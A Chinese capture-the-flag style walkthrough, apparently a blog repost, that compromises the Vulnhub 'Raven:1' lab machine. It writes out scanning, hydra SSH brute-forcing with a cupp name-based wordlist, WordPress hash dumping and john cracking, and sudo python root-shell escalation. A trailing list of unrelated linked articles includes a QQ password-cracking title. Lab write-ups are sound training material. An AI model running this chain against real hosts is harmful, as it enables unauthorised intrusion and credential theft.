Vulnhub靶机渗透-Raven:1

访客4年前黑客工具1242

  nmap -p 80,22,21,25,3389,443 192.168.8.0/24

  or

  netdiscover 192.168.8.0/24

  

  来更加深入的扫描一下:

  nmap -sS -sV -T5 -A -p- 192.168.8.156

  

  

  

  首先大致浏览了一遍,发现有个wordpress(建议把域名加入hosts):

  

  用户名MICHAEL,既然是wp那就用wpscan,先更新下漏洞库:

  

  WordPress version 4.8.12

  Theme twentysenventeen version 1.3

  image.png

  同时这个主题也没有发现有什么东西,所以考虑爆一下后台(字典无果可cewl生成):

  爆破的同时我进行了0x03的操作,拿到michael的ssh账号后,可以直接写入shell,并且还没有爆出后台密码,所以停止。

  Open SSH 6.7p1

  并没有发现对应版本的Vunerability,用hydra爆一下:

  hydra -l michael -P /usr/share/wordlists/fasttrack.txt ssh://raven.local

  并没有爆出密码,这里用cupp生成一个新的字典:

  cupp -i

  

  因为我们只知道目标姓名,其他一概不知,所以没有就回车.

  

  爆出了密码,进入看看吧。

  michael@Raven:~$ uname -a

  Linux Raven 3.16.0-6-amd64 #1 *** P Debian 3.16.57-2 (2018-07-14) x86_64 GNU/Linux

  

  没什么可以利用的,再看一下SUID:

  

  没什么可以直接用的,并且michael没有sudo权限,但是发现了flag2.

  

  看一下网站配置文件,或许有root呢?

  

  Mysql的root权限,尝试用这个密码去登录ssh,但是并没有成功,登陆steven也没成功.

  wp_content中发现了flag3

  select * from wp_postsG

  

  所以考虑看一下mysql中存放的wp的密码:

  select * from wp_usersG

  

  michael:$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

  steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/

  这直接解肯定解不开了,想用John破解一下(如有shadow和passwd也可用john):

  SELECT CONCAT(user_login, ":", user_pass) FROM wp_users INTO OUTFILE '/tmp/wordpress.txt';

  我们的字典用著名的rockyou,kali自带的:

  接下来用john:

  john --wordlist=/usr/share/wordlists/rockyou.txt wordpress.txt

  emmm,先破着吧,要上操作系统原理了……

  

  破出了steven的密码,尝试去登录ssh成功,因为前面内核和suid提权均失败,并且michael也没有sudo权限,那么看一下Steven是否有sudo权限:

  sudo -l

  

  尝试用sudo python执行shell:

  sudo python3 -c 'import pty; pty.spawn("/bin/sh")'

  

  emmm,失败……另一种:

  sudo python -c 'import os; os.system("/bin/sh")'

  flag4

  

  0x05 Summary

  本次渗透值得注意的地方就是:

  社会工程学密码字典生成的应用

  john破解HASH的应用

  hydra爆破各种协议的应用

  得到的密码可能通用:例如得到wp的密码可以尝试登陆ssh

  sudo提权

  

  原创投稿作者:Railgun作者博客:www.pwn4fun.com

相关文章

电子温度计怎么用(电子温度计怎么用才准)

电子体温计怎么用,正确的测量方法,看完你就知道了 电子温度计(图5-32)是用于制冷设备维修时测量电冰箱、空调器等制冷系统各部位温度的仪器。图5-32电子温度计(1)使。 电子温度计如何用?这个产品说...

如何用PS换口红颜色,ps改变口红颜色的教程

朋友们大家了解怎样用PS换口红色号呢?今日我很愿意与大伙儿共享ps更改口红色号的实例教程,很感兴趣的能够来掌握掌握哦。       朋友们大家了解怎样用PS换口红色号呢?今日我很愿意与大伙儿共享ps更...

万能破qq密码手机版在线(万能破密码手机版网站)

万能破qq密码手机版在线(万能破密码手机版网站)

qq一直在手机上自动登录,在电脑上登不上了,忘记了密码怎么办? 1、进入QQ登录界面,点击忘记密码知道码,进入密码恢复页面;点击“找回密码”之后,将会弹出找回方式,选择是通过短信验证还是通过其他方式获...

网上购买网站(网上购买网站有哪些)

网上购买网站(网上购买网站有哪些)

本文目录一览: 1、购物网站有哪些? 2、网购正品网站有哪些 3、网上买衣服的平台有哪些? 4、网上买衣服那个平台比较好? 5、网上买东西哪个网站好? 6、购买家电上哪个网站好?...

黑客帝国网,黑客网络安全组织,有几个装b的黑客网站

//那么这串代码会变成#define PORT 9102 #define dwBuffSize 2048 2allowSchemes = ["http", "https"];前语"过发动"、"过网购"...

串串皇后加盟有优势吗?让人心潮澎湃

串串皇后加盟有优势吗?让人心潮澎湃

此刻的串串香市场成长的很是迅速,想要在浩瀚的串串香品牌中选择一个好的品牌也长短常不容易的。串串皇后加盟呈此刻各人的眼前,而且携带了浩瀚的优势和履历,全方位的展示着自身的特色和魅力,已经有许多的加盟商被...